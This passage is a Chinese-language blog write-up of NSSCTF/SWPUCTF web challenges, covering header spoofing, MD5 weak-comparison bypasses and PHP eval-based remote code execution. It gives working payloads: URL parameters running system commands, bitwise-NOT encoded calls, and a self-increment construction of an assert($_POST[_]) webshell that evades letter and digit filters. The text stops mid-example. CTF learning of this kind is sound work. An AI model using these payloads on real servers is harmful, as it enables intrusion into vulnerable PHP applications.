<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>NSSCTF | 墨水彩笔</title><meta name="author" content="墨水彩笔"><meta name="copyright" content="墨水彩笔"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="刷题[SWPUCTF 2021 新生赛]Do_you_know_http已解决这一题学到的知识是burp改包内容 12X-Forwarded-For:127.0.0.1 		可以修改请求地址，绕过You can only read this at local!Please use &#39;WLLM&#39; browser!      通过求改User-Agent: WLLM     [SWPU">
<meta property="og:type" content="article">
<meta property="og:title" content="NSSCTF">
<meta property="og:url" content="http://example.com/2022/10/25/NSSCTF/index.html">
<meta property="og:site_name" content="墨水彩笔">
<meta property="og:description" content="刷题[SWPUCTF 2021 新生赛]Do_you_know_http已解决这一题学到的知识是burp改包内容 12X-Forwarded-For:127.0.0.1 		可以修改请求地址，绕过You can only read this at local!Please use &#39;WLLM&#39; browser!      通过求改User-Agent: WLLM     [SWPU">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2022-10-25T10:40:09.000Z">
<meta property="article:modified_time" content="2022-11-04T17:07:02.441Z">
<meta property="article:author" content="墨水彩笔">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2022/10/25/NSSCTF/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2022-11-05 01:07:02'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">67</div></a></div></div></div><hr/></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%B7%E9%A2%98"><span class="toc-number">1.</span> <span class="toc-text">刷题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-Do-you-know-http%E5%B7%B2%E8%A7%A3%E5%86%B3"><span class="toc-number">1.0.1.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]Do_you_know_http已解决</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-easy-md5%E5%B7%B2%E8%A7%A3%E5%86%B3"><span class="toc-number">1.0.2.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]easy_md5已解决</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87"><span class="toc-number">1.0.3.</span> <span class="toc-text">数组绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%86%85%E5%AE%B9%EF%BC%88RCE%EF%BC%89"><span class="toc-number">1.1.</span> <span class="toc-text">命令执行内容（RCE）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-easyrce"><span class="toc-number">1.1.0.1.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]easyrce</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-babyrce"><span class="toc-number">1.1.1.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]babyrce</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-hardrce"><span class="toc-number">1.1.2.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]hardrce</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-hardrce-3"><span class="toc-number">1.1.3.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]hardrce_3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SCTF-2021-rceme"><span class="toc-number">1.1.4.</span> <span class="toc-text">[SCTF 2021]rceme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2020-rceme"><span class="toc-number">1.1.5.</span> <span class="toc-text">[极客大挑战 2020]rceme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-finalrce"><span class="toc-number">1.1.6.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]finalrce</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AB%A0%E8%8A%82"><span class="toc-number">2.</span> <span class="toc-text">反序列化章节</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ZJCTF-2019-NiZhuanSiWei"><span class="toc-number">2.1.</span> <span class="toc-text">[ZJCTF 2019]NiZhuanSiWei</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.1.0.1.</span> <span class="toc-text">伪协议</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-pop"><span class="toc-number">2.2.</span> <span class="toc-text">[SWPUCTF 2021 新生赛]pop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%A9%E7%BF%BC%E6%9D%AF-2021-esay-eval"><span class="toc-number">2.3.</span> <span class="toc-text">[天翼杯 2021]esay_eval</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF%EF%BC%88%E8%87%AA%E7%94%B1%E8%B5%9B%E9%81%93%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">HNCTF（自由赛道）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">3.1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Interesting-include"><span class="toc-number">3.1.0.1.</span> <span class="toc-text">Interesting_include</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#easy-include"><span class="toc-number">3.1.0.2.</span> <span class="toc-text">easy_include</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E5%8C%85%E5%90%AB"><span class="toc-number">3.1.0.2.1.</span> <span class="toc-text">日志包含</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%AF%87"><span class="toc-number">4.</span> <span class="toc-text">SQL注入篇</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%99%AE%E9%80%9A%E6%B3%A8%E5%85%A5"><span class="toc-number">4.0.1.</span> <span class="toc-text">普通注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#FLAG%E5%AD%98%E6%94%BE%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.</span> <span class="toc-text">FLAG存放的位置</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%84%E7%A7%8D%E7%BB%95%E8%BF%87"><span class="toc-number">6.</span> <span class="toc-text">各种绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF%E7%AA%81%E7%A0%B4"><span class="toc-number">7.</span> <span class="toc-text">思路突破</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">墨水彩笔</a></span><span id="menus"><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">NSSCTF</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2022-10-25T10:40:09.000Z" title="Created 2022-10-25 18:40:09">2022-10-25</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2022-11-04T17:07:02.441Z" title="Updated 2022-11-05 01:07:02">2022-11-05</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="刷题"><a href="#刷题" class="headerlink" title="刷题"></a>刷题</h1><h3 id="SWPUCTF-2021-新生赛-Do-you-know-http已解决"><a href="#SWPUCTF-2021-新生赛-Do-you-know-http已解决" class="headerlink" title="[SWPUCTF 2021 新生赛]Do_you_know_http已解决"></a>[SWPUCTF 2021 新生赛]Do_you_know_http已解决</h3><p>这一题学到的知识是burp改包内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For:127.0.0.1 		可以修改请求地址，绕过You can only read this at local!</span><br><span class="line">Please use &#39;WLLM&#39; browser!      通过求改User-Agent: WLLM </span><br></pre></td></tr></table></figure>

<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026143604654.png" class title="image-20221026143604654">

<h3 id="SWPUCTF-2021-新生赛-easy-md5已解决"><a href="#SWPUCTF-2021-新生赛-easy-md5已解决" class="headerlink" title="[SWPUCTF 2021 新生赛]easy_md5已解决"></a>[SWPUCTF 2021 新生赛]easy_md5已解决</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">md5弱类型比较</span><br><span class="line">0e绕过</span><br><span class="line">弱比较会把0exxxx当做科学计数法，不管后面的值为任何东西，0的任何次幂都为0</span><br><span class="line"></span><br><span class="line">只要两个变量经过md5加密之后前两位都变成0e就可以成功绕过，以下一些字符串的md5值前两位是0e</span><br><span class="line">QNKCDZO</span><br><span class="line">240610708</span><br><span class="line">s878926199a</span><br><span class="line">s155964671a</span><br><span class="line">s21587387a</span><br></pre></td></tr></table></figure>

<h3 id="数组绕过"><a href="#数组绕过" class="headerlink" title="数组绕过"></a>数组绕过</h3><p>md5()函数计算的是一个字符串的哈希值，对于数组则返回false</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026144118214.png" class title="image-20221026144118214">

<h2 id="命令执行内容（RCE）"><a href="#命令执行内容（RCE）" class="headerlink" title="命令执行内容（RCE）"></a>命令执行内容（RCE）</h2><h4 id="SWPUCTF-2021-新生赛-easyrce"><a href="#SWPUCTF-2021-新生赛-easyrce" class="headerlink" title="[SWPUCTF 2021 新生赛]easyrce"></a>[SWPUCTF 2021 新生赛]easyrce</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">if(isset($_GET[&#39;url&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">eval($_GET[&#39;url&#39;]);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>利用hackbar传入url参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;1.14.71.254:28006&#x2F;?url&#x3D;system(&#39;cat ..&#x2F;..&#x2F;..&#x2F;flllllaaaaaaggggggg&#39;);</span><br></pre></td></tr></table></figure>

<p>system不能利用cd ..返回上层，但可以利用ls ../查看</p>
<h3 id="SWPUCTF-2021-新生赛-babyrce"><a href="#SWPUCTF-2021-新生赛-babyrce" class="headerlink" title="[SWPUCTF 2021 新生赛]babyrce"></a>[SWPUCTF 2021 新生赛]babyrce</h3><img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026154120789.png" class title="image-20221026154120789">

<p>利用插件把cookie修改满足跳转条件，进入rasalghul.php</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026154154825.png" class title="image-20221026154154825">

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;1.14.71.254:28182&#x2F;rasalghul.php&#x2F;?url&#x3D;cat$&#123;IFS&#125;&#x2F;f*;</span><br></pre></td></tr></table></figure>

<h3 id="SWPUCTF-2021-新生赛-hardrce"><a href="#SWPUCTF-2021-新生赛-hardrce" class="headerlink" title="[SWPUCTF 2021 新生赛]hardrce"></a>[SWPUCTF 2021 新生赛]hardrce</h3><p>这一题不仅过滤了很多符号，还过滤了字母，那么如何绕过实现无字母RCE呢</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">header(&quot;Content-Type:text&#x2F;html;charset&#x3D;utf-8&quot;);</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">if(isset($_GET[&#39;wllm&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">    $wllm &#x3D; $_GET[&#39;wllm&#39;];</span><br><span class="line">    $blacklist &#x3D; [&#39; &#39;,&#39;\t&#39;,&#39;\r&#39;,&#39;\n&#39;,&#39;\+&#39;,&#39;\[&#39;,&#39;\^&#39;,&#39;\]&#39;,&#39;\&quot;&#39;,&#39;\-&#39;,&#39;\$&#39;,&#39;\*&#39;,&#39;\?&#39;,&#39;\&lt;&#39;,&#39;\&gt;&#39;,&#39;\&#x3D;&#39;,&#39;\&#96;&#39;,];</span><br><span class="line">    foreach ($blacklist as $blackitem)</span><br><span class="line">    &#123;</span><br><span class="line">        if (preg_match(&#39;&#x2F;&#39; . $blackitem . &#39;&#x2F;m&#39;, $wllm)) &#123;</span><br><span class="line">        die(&quot;LTLT说不能用这些奇奇怪怪的符号哦！&quot;);</span><br><span class="line">    &#125;&#125;</span><br><span class="line">if(preg_match(&#39;&#x2F;[a-zA-Z]&#x2F;is&#39;,$wllm))</span><br><span class="line">&#123;</span><br><span class="line">    die(&quot;Ra&#39;s Al Ghul说不能用字母哦！&quot;);</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;NoVic4说：不错哦小伙子，可你能拿到flag吗？&quot;;</span><br><span class="line">eval($wllm);</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;蔡总说：注意审题！！！&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>参考</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;miuzzx&#x2F;article&#x2F;details&#x2F;109143413</span><br></pre></td></tr></table></figure>

<p>因为过滤了^所以不能利用异或，因此选择取反绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;在命令行中运行</span><br><span class="line"></span><br><span class="line">&#x2F;*author yu22x*&#x2F;</span><br><span class="line"></span><br><span class="line">fwrite(STDOUT,&#39;[+]your function: &#39;);</span><br><span class="line"></span><br><span class="line">$system&#x3D;str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN)); </span><br><span class="line"></span><br><span class="line">fwrite(STDOUT,&#39;[+]your command: &#39;);</span><br><span class="line"></span><br><span class="line">$command&#x3D;str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN)); </span><br><span class="line"></span><br><span class="line">echo &#39;[*] (~&#39;.urlencode(~$system).&#39;)(~&#39;.urlencode(~$command).&#39;);&#39;;</span><br></pre></td></tr></table></figure>

<p>进行system(‘ls /‘)</p>
<img src="/2022/10/25/NSSCTF/10/25/NSSCTF/image-20221026164154808.png" class title="image-20221026164154808">

<p>接下来进行读取操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">下列都是无效操作</span><br><span class="line">system(&quot;cat flllllaaaaaaggggggg&quot;);</span><br><span class="line">?wllm&#x3D;(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);</span><br><span class="line"></span><br><span class="line">echo &#96;cat &#x2F;flllllaaaaaaggggggg&#96;</span><br><span class="line">?wllm&#x3D;(~%9A%9C%97%90)(~%9F%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98%9F);</span><br><span class="line">这时候发现不对劲是不是有WAF</span><br><span class="line"></span><br><span class="line">利用其他的读取函数试试</span><br><span class="line">system(rve flllllaaaaaaggggggg)</span><br><span class="line">http:&#x2F;&#x2F;1.14.71.254:28439&#x2F;?wllm&#x3D;(~%8C%86%8C%8B%9A%92)(~%8D%9A%89%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);</span><br><span class="line">可以得到</span><br></pre></td></tr></table></figure>

<p><strong>拓展</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">more flag</span><br><span class="line">tail flag</span><br><span class="line">fmt flag</span><br><span class="line">rev flag</span><br><span class="line">tac flag</span><br><span class="line">base64 flag</span><br><span class="line">iconv -f utf-8 -t utf-7 flag</span><br><span class="line">iconv -f utf-8 -t utf-16 flag</span><br></pre></td></tr></table></figure>



<h3 id="SWPUCTF-2021-新生赛-hardrce-3"><a href="#SWPUCTF-2021-新生赛-hardrce-3" class="headerlink" title="[SWPUCTF 2021 新生赛]hardrce_3"></a>[SWPUCTF 2021 新生赛]hardrce_3</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">header(&quot;Content-Type:text&#x2F;html;charset&#x3D;utf-8&quot;);</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">if(isset($_GET[&#39;wllm&#39;]))</span><br><span class="line">&#123;</span><br><span class="line">    $wllm &#x3D; $_GET[&#39;wllm&#39;];</span><br><span class="line">    $blacklist &#x3D; [&#39; &#39;,&#39;\^&#39;,&#39;\~&#39;,&#39;\|&#39;];</span><br><span class="line">    foreach ($blacklist as $blackitem)</span><br><span class="line">    &#123;</span><br><span class="line">        if (preg_match(&#39;&#x2F;&#39; . $blackitem . &#39;&#x2F;m&#39;, $wllm)) &#123;</span><br><span class="line">        die(&quot;小伙子只会异或和取反？不好意思哦LTLT说不能用！！&quot;);</span><br><span class="line">    &#125;&#125;</span><br><span class="line">if(preg_match(&#39;&#x2F;[a-zA-Z0-9]&#x2F;is&#39;,$wllm))</span><br><span class="line">&#123;</span><br><span class="line">    die(&quot;Ra&#39;sAlGhul说用字母数字是没有灵魂的！&quot;);</span><br><span class="line">&#125;</span><br><span class="line">echo &quot;NoVic4说：不错哦小伙子，可你能拿到flag吗？&quot;;</span><br><span class="line">eval($wllm);</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;蔡总说：注意审题！！！&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?</span><br></pre></td></tr></table></figure>

<p>这是上面拿到题目的加强版，因为这次连数字都不允许出现，那么异或和取反就很难实现了</p>
<p>因此这里使用自增方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$_&#x3D;[];$_&#x3D;@&quot;$_&quot;;$_&#x3D;$_[&#39;!&#39;&#x3D;&#x3D;&#39;@&#39;];$___&#x3D;$_;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.&#x3D;$__;$___.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$___.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.&#x3D;$__;$____&#x3D;&#39;_&#39;;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.&#x3D;$__;$__&#x3D;$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.&#x3D;$__;$_&#x3D;$$____;$___($_[_]);</span><br><span class="line"></span><br><span class="line">这是固定格式构造出来的 assert($_POST[_]);</span><br><span class="line"></span><br><span class="line">然后post传入 _&#x3D;phpinfo();</span><br><span class="line"></span><br><span class="line">使用时需要url编码.</span><br><span class="line"></span><br><span 